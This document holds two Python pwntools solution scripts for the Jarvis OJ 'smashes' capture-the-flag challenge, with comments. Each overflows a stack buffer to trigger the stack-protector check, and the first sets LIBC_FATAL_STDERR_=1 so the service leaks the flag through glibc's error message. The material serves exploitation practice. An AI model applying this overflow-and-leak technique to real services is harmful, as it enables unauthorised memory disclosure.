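"""Jarvis OJ "smashes" solution script (stack-protector message leak).

The script overflows the buffer read after the "name?" prompt so that the
stack-smashing check (``__stack_chk_fail``) fires, then sends
``LIBC_FATAL_STDERR_=1`` as the second input.  That variable makes glibc write
its fatal message to stderr instead of /dev/tty, so the remote service echoes
the message back; the addresses placed in the overflow presumably make the
message print the flag string in place of the program name (TODO confirm
against the binary).

Fixes over the original listing: the mis-encoded quote characters (which are a
syntax error) are replaced by ASCII quotes, every value handed to the tube is a
bytes literal (``b"..."`` is plain ``str`` on Python 2, so the script now runs
under both Python 2 and 3), ``print`` is called as a function, and the
connection is closed at the end.

NOTE(review): recent glibc (2.26 and later, verify) no longer prints the
program name in the stack-smashing message, so this leak does not exist on a
current libc.
"""
from pwn import *

# Addresses taken from the challenge binary.  Both are named as flag copies in
# the original writeup; which one is still intact when the check fires is not
# visible here -- confirm with the binary before reusing.
old_flag_addr = 0x600d20
new_flag_addr = 0x400d20

# p = process('./smashes')  # local run
p = remote('pwn.jarvisoj.com', 9877)

p.recvuntil(b"name?")
# 0x218 bytes of filler come from the writeup (offset to the target slot);
# the three qwords after it keep the exact layout the writeup used.
payload = b"a" * 0x218 + p64(new_flag_addr)
payload += p64(0) + p64(old_flag_addr)
p.sendline(payload)

p.recvuntil(b"flag: ")
# Second input: ask libc to route the fatal message to stderr so the service
# returns it over the socket.
env = b"LIBC_FATAL_STDERR_=1"
p.sendline(env)

flag = p.recv()
print(flag)
p.close()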
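"""Alternative "smashes" solution: instead of laying out an exact payload, the
first input is flooded with the flag-copy address (0x0400d20 repeated 300
times), an empty second line is sent, and whatever comes back is read.

This is the original one-line listing split onto proper lines, with the
mis-encoded quote characters (a syntax error) replaced by ASCII quotes.  The
300x repeat is the writeup's choice, not a computed offset.  ``p64`` already
returns bytes, so the script runs under both Python 2 and 3.
"""
from pwn import *

context.log_level = 'debug'
cn = remote('pwn.jarvisoj.com', 9877)
# cn = remote-less local run: cn = process('smashes')

cn.recv()
cn.sendline(p64(0x0400d20) * 300)
cn.recv()
cn.sendline()  # empty second input
cn.recv()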
原文地址:http://www.cnblogs.com/elvirangel/p/6863206.html